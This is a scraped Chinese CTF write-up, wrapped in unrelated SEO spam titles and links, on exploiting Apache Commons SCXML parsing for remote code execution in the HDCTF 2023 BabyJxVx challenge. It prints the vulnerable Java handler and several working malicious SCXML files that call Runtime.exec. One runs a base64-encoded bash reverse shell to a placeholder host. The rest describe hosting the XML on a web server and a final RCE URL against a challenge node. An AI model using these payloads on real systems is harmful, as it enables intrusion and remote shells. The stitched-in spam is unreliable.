当前位置: 首页 > news >正文

专业的营销网站建设公司wordpress收费播放插件

news 2025/11/5 15:48:58
专业的营销网站建设公司,wordpress收费播放插件,怎么上传网站模板,开发人员选项怎么打开文章目录 前言源码利用上传恶意xml文件构造payload搭建Apache服务器 远程RCE 前言 在做 [HDCTF 2023]BabyJxVx 遇到的知识点,但是没公网的服务器只能作罢,写下这篇文章记录 源码利用 public String Flag(RequestParam(required true) String filenam…

文章目录

  • 前言
  • 源码利用
  • 上传恶意xml文件
    • 构造payload
    • 搭建Apache服务器
  • 远程RCE

前言

在做 [HDCTF 2023]BabyJxVx 遇到的知识点,但是没公网的服务器只能作罢,写下这篇文章记录

源码利用

public String Flag(@RequestParam(required = true) String filename) {SCXMLExecutor executor = new SCXMLExecutor();try {if (check(filename)) {SCXML scxml = SCXMLReader.read(filename);executor.setStateMachine(scxml);executor.go();return "Revenge to me!";}System.out.println("nonono");} catch (Exception var4) {System.out.println(var4);}return "revenge?";
}

大概考点就是接收filename参数,然后利用SCXMLReader.read()方法来读取恶意xml

上传恶意xml文件

构造payload

shell.xml源码

<?xml version="1.0"?>
<scxml xmlns="http://www.w3.org/2005/07/scxml" version="1.0" initial="run"><final id="run"><onexit><assign location="flag" expr="''.getClass().forName('java.lang.Runtime').getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9pcC9wb3J0IDA+JjE=}|{base64,-d}|{bash,-i}')"/></onexit></final>
</scxml>
  • <scxml xmlns="http://www.w3.org/2005/07/scxml" version="1.0" initial="run"> :定义了一个 SCXML 状态机,其中 xmlns属性指定了命名空间,version属性指定了版本,initial 属性指定了初始状态为 run。
  • <final id="run">:定义了一个状态,它是最终状态,它的 id 属性为 run。
  • <onexit>:定义了一个事件,在退出状态时触发
  • <assing........> : location 属性指定了要赋值的变量名称,expr 属性指定了要赋给变量的值。

除此之外还有很多构造的

<?xml version="1.0"?> 
<scxml xmlns="http://www.w3.org/2005/07/scxml" version="1.0" initial="run"><state id="run"><onentry> <script> ''.getClass().forName('java.lang.Runtime').getRuntime().exec('calc')</script></onentry></state>
</scxml>

<?xml version="1.0"?>
<scxml xmlns="http://www.w3.org/2005/07/scxml" version="1.0" initial="run"><state id="run"><onentry><if cond="''.getClass().forName('java.lang.Runtime').getRuntime().exec('calc')"></if></onentry></state>
</scxml>

<?xml version="1.0"?>
<scxml xmlns="http://www.w3.org/2005/07/scxml" version="1.0" initial="run"><datamodel><data id="flag" expr="''.class.forName('java.lang.Runtime').getRuntime().exec('calc.exe')"></data></datamodel>
</scxml>

<?xml version="1.0"?>
<scxml xmlns="http://www.w3.org/2005/07/scxml" version="1.0" initial="run"><parallel><invoke src="test" content="test" id="flag"> <param name="flag" expr="''.class.forName('java.lang.Runtime').getRuntime().exec('calc.exe')"></param></invoke></parallel>
</scxml>

<?xml version="1.0"?>
<scxml xmlns="http://www.w3.org/2005/07/scxml" version="1.0" initial="run"><state><history src="test" content="test" id="flag"><transition name="flag" cond="''.class.forName('java.lang.Runtime').getRuntime().exec('calc.exe')"></transition></history></state>
</scxml>

搭建Apache服务器

首先我们得在本地搭建服务器,这里我以kali为例
依次执行以下命令

sudo apt-get updatesudo apt-get install apache2sudo service apache2 start    #启动服务

然后我们在浏览器访问http://ip
在这里插入图片描述
然后我们将写好的xml文件mv到该根目录下

mv /home/kali/shell.xml /var/www/html/

上传成功后我们开启临时文件服务器,在根目录执行下面命令

python3 -m http.server 8000

在这里插入图片描述
访问8000端口,成功访问
在这里插入图片描述

远程RCE

我们直接在题目处远程RCE,payload如下

http://node4.anna.nssctf.cn:28342/Flag?filename=http://服务器ip:8000/shell.xml
http://www.dtcms.com/a/570691.html

相关文章:

  • 在线推广网站的方法win8风格网站 源码
  • dede 网站源码百科网wordpress
  • C++类成员变量的存储逻辑与析构函数的资源管理
  • 中国摄影在线网站seo销售话术开场白
  • 网站建设及数据分析公众号做电影网站赚钱
  • 阿里巴巴外贸网站论坛cms建站方案
  • 浙江建设职业技术学院尔雅网站易捷网站内容管理系统漏洞
  • PAI Physical AI Notebook详解1:基于Isaac仿真的操作动作数据扩增与模仿学习
  • 网站信息邯郸做网站推广
  • 网站开发区书籍上海浦东哪里有做网站的公司
  • 保定市建设局质监站网站dede网站备份
  • vue Template 1.3.1在代理时拿到的process.env.BASE_API不存在
  • 基于Vue的儿童手工创意店管理系统as8celp7(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。
  • el-tooltip加背景图
  • 江苏营销型网站推广商城微网站建设
  • 最小二乘问题详解8:Levenberg-Marquardt方法
  • 徐州网站建设与推广河南推广网站的公司
  • asp做招聘网站流程品牌对于企业的重要性
  • Python中生成13位时间戳方法
  • Mybatis入门
  • SpringBoot之动态代理
  • java每日精进 11.04【关于线程的思考】
  • 广州 餐饮 网站建设微网站策划方案
  • 公司网站首页怎么制作网站建设邯郸
  • 网站开发工具的功能有哪些建站平台工具
  • Ie8网站后台编辑文章wordpress外贸模版
  • 读书笔记|理财,锻炼,阅读,思考
  • 【产品调研】运动生物力学软件工具对比
  • 马卡龙网站建设方案阿里巴巴国际站费用
  • 网站开发融资计划徐州列表网